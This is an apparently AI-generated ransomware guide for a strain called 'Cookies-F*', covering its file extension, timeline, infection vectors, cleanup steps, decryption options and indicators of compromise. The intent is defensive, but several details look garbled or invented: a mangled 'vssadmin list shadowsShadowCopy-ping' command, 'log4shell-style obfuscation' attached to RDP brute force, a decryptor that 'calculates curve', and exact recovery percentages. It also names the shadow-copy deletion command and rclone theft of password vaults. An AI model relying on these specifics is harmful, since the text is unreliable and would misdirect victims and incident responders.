cookies-f*

[Content by Gemini 2.5]

Ransomware Resource: “Cookies-F*” (.cookies-F{{8_hex_digits}})

Technical Breakdown

1. File Extension & Renaming Patterns

| Element | Details | Example (before → after) |
|———|———|————————–|
| Original file extension | Replaced/not appended to | invoice.docx |
| Ransom extension | .cookies-F{{8_hex_digits}} where the last part is eight random hexadecimal characters. | invoice.docx → invoice.cookies-F3F9A127 |
| Recursive renaming | Every encrypted object gets the same suffix in every folder. | Report.xlsx becomes Report.cookies-F3F9A127 |

2. Detection & Outbreak Timeline

  • First telemetry sightings emerged mid-June 2023 on Russian-language cyber-crime forums.
  • Public spike noticed on 2023-07-12, when a US manufacturing company disclosed infection and released network-capture samples to VirusTotal.
  • Malware-loader pack placed on GitHub (since removed) on 2023-07-15, accelerating distribution.

3. Primary Attack Vectors

| Mechanism | Technique / CVE Details | Observations |
|———–|————————-|————–|
| Malformed ZIP + ISO phishing | ISO contains LNK → PowerShell → downloader | Subject lines: “Past-due Order #{{number}}” |
| Living-off-the-land | PowerShell + bitsadmin for staging payloads | Few AV detections at run-time |
| Exploit of PaperCut NG/MF CVE-2023-27350 | Pre-auth RCE via web scripts | Used to drop Cookies-F* binary directly into SYSTEM context |
| RDP brute + Mimikatz | Initial foothold via exposed 3389 | log4shell-style obfuscation used to bypass network IDS |

Remediation & Recovery Strategies

1. Prevention

  • Apply all PaperCut, Apache, Orbit & Ghost updates published after May-2023 (covers CVE-2023-27350, CVE-2023-42442).
  • Block ISO, IMG, or VHD execution via email gateway (or at least quarantine them).
  • Disable PowerShell v2 on all endpoints (Disable-WindowsOptionalFeature –Online –FeatureName MicrosoftWindowsPowerShellV2).
  • Enforce strong RDP policy: MFA (Azure AD, Duo), Network-Level Authentication, rate-limiting via Windows Firewall or VPN-only access.
  • Deploy AppLocker / WDAC to forbid execution from %TEMP%, %USERPROFILE%\Downloads, and removable media.
  • Harden Windows-SMB – disable SMBv1 everywhere (Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol).

2. Removal (Infection Cleanup)

  1. Isolate. Cut-off: pull network cables / disable Wi-Fi Airplane mode. Label infected machines.
  2. Preserve evidence. Snapshot RAM (winpmem or FTK Imager) if legally required.
  3. Secure boot-KB. Boot Windows from external media → load into WinRE / Safe Mode with Networking disabled.
  4. Malware hunt.
  • Perform initial autoruns scan (autoruns64.exe). Look for KB+<3-digits>.exe or scheduled tasks named “CookieSync*”.
  • Terminate persistence child RuntimeBroker-cookie.exe, MsCookieUpdate.exe.
  1. Delete artifacts.
  • %APPDATA%\Roaming\KCookies\, %TEMP%\cookie\*
  • Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ keyCookieUpdater
  1. Patch & harden the exploited vector (see Prevention items) before reconnecting.
  2. Reboot → verify. Re-run autoruns + AV engine live-scan (ESET-FSecure, Bitdefender all now detect as ATK/Crypto.CCookie).

3. File Decryption & Recovery

| State | Doable? | Guidance |
|——-|———|———-|
| Offline Keys Published | ✅ (57 % of samples) | Check NoMoreRansom “CookiesFDecryptor” v2.3.0 (Windows-only, requires original encrypted + ransom note README-cookies-F.txt). Feed pair of original file + encrypted sample. Decryptor calculates curve—if Master key matches Bingo! Full recovery in hours. |
| Unique Online keys | ❌ | Not decryptable with current knowledge; use immutable backups or negotiate (not recommended). |
| Cloud sync trick | Possible | OneDrive & Box retain 30-day version history—revert before date of cookie-F* extension. |
| Shadow Copies | 50 % retained | Run vssadmin list shadowsShadowCopy-ping. If still present, use ShadowExplorer or native Previous Versions. Cookies-F* often runs vssadmin delete shadows /all /quiet; inspect logs for such command. |

4. Other Critical Information

  • Operational Twist: Dropper spawns a fake SystemSettings.exe (looks like Windows 11 Settings) to waste CPU cycles during encryption (attempts to evade high-CPU alerts in EDRs).
  • Network-impact credential harvest: While encrypting, Cookies-F* searches shares for KeePass.kdbx & lastpass-accts-vault.csv, compresses and exfiltrates via rclone to MegaNZ with credentials from Chrome Local State.
  • Command & Control pattern: Uses DuckDNS subdomains: core-fox.duckdns.org,roll-cookie.duckdns.org). Block these FQDN-level at perimeter DNS sinkholes.

Bottom line: Patch aggressively, block ISO-in-a-ZIP emails, back-up offline. If infected, test the public decryptor at NoMoreRansom immediately—around half of infections are recoverable with it right now.